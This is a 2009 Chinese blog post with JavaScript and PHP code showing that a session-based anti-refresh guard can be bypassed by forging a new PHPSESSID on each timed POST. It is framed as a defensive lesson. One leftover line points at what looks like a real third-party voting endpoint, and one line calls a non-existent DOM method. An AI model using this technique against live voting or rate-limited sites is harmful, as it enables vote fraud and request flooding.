
[PHP]php的sessionid可以伪造,不要用来做防刷新处理

(2009-07-04 18:00:19)
标签:

xmlhttp

cookie

if

document

杂谈

如果是基于 session 或者 cookie 做防止刷新,那么我可以伪造状态,用 xmlhttp 把服务器刷爆。代码如下,服务器端的代码在最后一个 textarea 里。

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title> xmlhttp</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script language="javascript" type="text/javascript" src="fckXML.js"></script>
<script language="javascript" type="text/javascript">
<!--

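/**
 * Write a cookie on the current document.
 *
 * @param {string} sName  - cookie name, written verbatim
 * @param {string} sValue - cookie value; encoded with the legacy escape() so the
 *                          stored form stays identical to what earlier callers saw
 * @param {Date} [expiresAt=new Date()] - expiry timestamp. The historical default
 *                          is "now", which makes the browser drop the cookie at
 *                          once; pass a future Date to actually persist it.
 * @returns {void}
 */
function SetCookie(sName, sValue, expiresAt = new Date())
{
  // Declared with const: the original assigned an undeclared `date`, which
  // leaked a global and throws under strict mode / ES modules.
  const expires = expiresAt.toUTCString();
  document.cookie = `${sName}=${escape(sValue)}; expires=${expires}`;
}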

// Pick an XHR implementation. `oXmlHttp` is an implicit global and a single
// object shared by every call of zuobiStart() below.
if ( window.XMLHttpRequest )  // Gecko
 oXmlHttp = new XMLHttpRequest() ;
else if ( window.ActiveXObject ) // IE
 oXmlHttp = new ActiveXObject("MsXml2.XmlHttp") ;

// Target of the POST. Only the last assignment takes effect; the first two are
// dead leftovers from earlier test runs.
urlToCall = "http://toupiao.scol.com.cn/toupiao_save.asp";
urlToCall = "http://develop-3/test/jstest/xmlhttp/server.php";
urlToCall = "http://test.bai.com/jstest/xmlhttp/server.php";
host = "test.bai.com";
var bAsync = 1 ; // truthy, so open() below is asynchronous
result = '';     // responseText accumulated from completed requests
i = 1;           // tick counter, incremented once per zuobiStart() call
n = 2;           // number of ticks after which the interval is cleared
// Proof of concept for the claim in the post: one POST per timer tick, each
// carrying a freshly invented PHPSESSID. Because the client picks the session
// id, the server opens a new, empty session every time, and a "posted" flag
// kept in the previous session is never consulted. The defender's lesson is
// that state held in a session or cookie cannot throttle a client that controls
// that state; throttling has to be keyed on something the client cannot choose.
function zuobiStart()
{
//open the url (bAsync is truthy, so this is an asynchronous request)
oXmlHttp.open( "POST", urlToCall, bAsync ) ;

//forge the session id: the server, seeing an unknown id, starts a new session,
//so everything stored in the old one stops mattering. The id is two
//Math.random() values glued together, dots replaced by zeros, cut to 32 chars.
phpsessid = Math.random();
id2 = Math.random();
phpsess = phpsessid.toString()+'11111'+id2.toString();
phpsess = phpsess.replace( /\./g,"0"  );
phpsess = phpsess.substr( 0,32 );
cook ="PHPSESSID="+phpsess+"; ";
 
//set PHPSESSID via document.cookie. PHP selects the session by this cookie,
//and the browser attaches document.cookie to the XHR by itself, so this single
//line is what actually swaps the session.
document.cookie=cook;

//request headers the author found settable from script (current browsers
//also refuse User-Agent, Accept-Encoding and Connection from script)
oXmlHttp.setRequestHeader (  "ADDR000", 'test'  );
oXmlHttp.setRequestHeader (  "User-Agent", "Mozilla/4.0 " );
oXmlHttp.setRequestHeader(  "accept-language", "zh_cn");
oXmlHttp.setRequestHeader(  "CONTENT-TYPE","application/x-www-form-urlencoded");
oXmlHttp.setRequestHeader( "accept-encoding", "gzip, deflate");
oXmlHttp.setRequestHeader( "CONNECTION", "keep-alive");
oXmlHttp.setRequestHeader( "accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

//headers the browser does not let script set; the server never sees these
//values. Cookie, Host, Referer and Content-Length are filled in by the browser
//itself (the "11" here does not match the 22-byte body anyway).
oXmlHttp.setRequestHeader( "Referer", 'example.test.com'); 
oXmlHttp.setRequestHeader ("Cookie", cook);
oXmlHttp.setRequestHeader ("HOST", host );
oXmlHttp.setRequestHeader( "content-length", "11"); 
oXmlHttp.setRequestHeader( "CACHE_CONTROL", "kcache");

 params = 'item_button=45&topic=5';
 //send the form body
 oXmlHttp.send(params) ;
 //collect the response text once the request completes (readyState 4).
 //The handler is attached after send() and one XHR object is shared by all
 //ticks, so `result` is not guaranteed to hold every response.
 oXmlHttp.onreadystatechange = function()
 {
  if ( oXmlHttp.readyState == 4 )
  {
   result += oXmlHttp.responseText;
  }
 }
 //tick counter
 i++;
 //stop after n ticks and show whatever was collected in the #info textarea
 if (i>n){
  //alert("end\n"+i.toString()+"\n"+n.toString());
  //getElementByIdx is not a DOM method (looks like a mangled getElementById,
  //probably a blog-editor artifact); as written this line throws.
  infoObj = document.getElementByIdx('info');
  infoObj.value = result;
  //info.value = result+"慰问慰问";
  clearInterval(flushtimerID);
 }
}//end func
//结束

// Start the demo: call zuobiStart() every 100 ms until it clears the interval itself.
flushtimerID = window.setInterval(zuobiStart,100);

//-->
</script>
</head>

<body>

<textarea name="info"  id="info" rows="10" cols="90" >

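<?php
 require_once('echo.php');
session_start();

// Demo endpoint for the post above. The "posted" guard below lives in the PHP
// session, which is selected by the PHPSESSID cookie the *client* sends. A
// client that presents a new id on every request gets a fresh, empty session
// and is never refused, so this guard is a UX nicety, not abuse protection;
// real throttling must be keyed on something the client cannot choose.
//pr($_COOKIE);pr($_GET);pr($_POST);
//pr($_SESSION);pr($_COOKIE);

// isset() avoids an undefined-index notice on the first request of a session.
if ( isset($_SESSION['posted']) && $_SESSION['posted'] == 1 ) {
    echo"error";
    DIE;
}

//get cookie number. Cast to int: the value is client-supplied and is reused
//later on this page to build a file name, so it must never carry arbitrary text.
$num = isset($_COOKIE['currNum']) ? (int)$_COOKIE['currNum'] : 0;
$expires = time()+60*60*24*365;
if (!isset($_COOKIE['currNum'])) {
    setcookie('currNum' , 1 , $expires );
    echo "cookie没有设置\n";
}
else {
    $num++;
    // NOTE(review): no expiry here, unlike the branch above, so this is a
    // session cookie — confirm that is intended.
    setcookie('currNum',$num);
    echo $num;
}
?>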
<style type="text/css">
*{font:12px verdana;}
</style>
<pre>
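<?php
// Echo the request back for inspection. $_POST values are no longer copied
// into same-named variables ($$key): that let a client overwrite $num, $str
// or $fp before they are used below (the same hazard register_globals had).
$str = '';
foreach ($_POST as $key=>$v) {
    $str .=$v."\r\n";
    //echo "$v \n";
}
//print_R($_SERVER);
// NOTE(review): this returns every $_SERVER entry (file-system paths, internal
// host names, raw headers) to the client — acceptable for a local test page only.
foreach ($_SERVER as $k=>$v) {
    $str .=$k."=".$v."\n";
}

echo $str;

// $num comes from the client cookie (set earlier on this page); coerce it to an
// integer so the file name cannot carry path separators or ".." segments.
$fileNum = isset($num) ? (int)$num : 0;
$fp = fopen("d:/tmp/".$fileNum.".txt","wb");
if ($fp !== false) {
    //fwrite($fp,$str);
    fclose($fp);
}

// Session-held flag consulted at the top of the page; see the note there on
// why it cannot stop a client that chooses its own session id.
$_SESSION['posted'] = 1;
?>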
